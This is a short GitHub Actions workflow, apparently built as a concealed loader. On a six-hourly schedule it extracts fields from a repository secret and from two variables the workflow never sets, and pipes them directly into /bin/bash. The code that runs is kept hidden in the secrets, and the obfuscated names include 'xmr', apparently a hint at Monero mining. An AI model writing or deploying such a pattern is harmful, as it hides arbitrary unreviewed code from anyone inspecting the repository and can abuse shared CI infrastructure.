name: jianadadelvshi
on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jianadadelvshi
        env:
          rlrme0844: ${{ secrets.rlrme0844 }}
        run: |
          echo $rlrme0844 | jq -r .mh3175 | /bin/bash
          echo $j8 | jq -r .wq3 | /bin/bash
          echo $xmr19 | jq -r .dq9 | /bin/bash

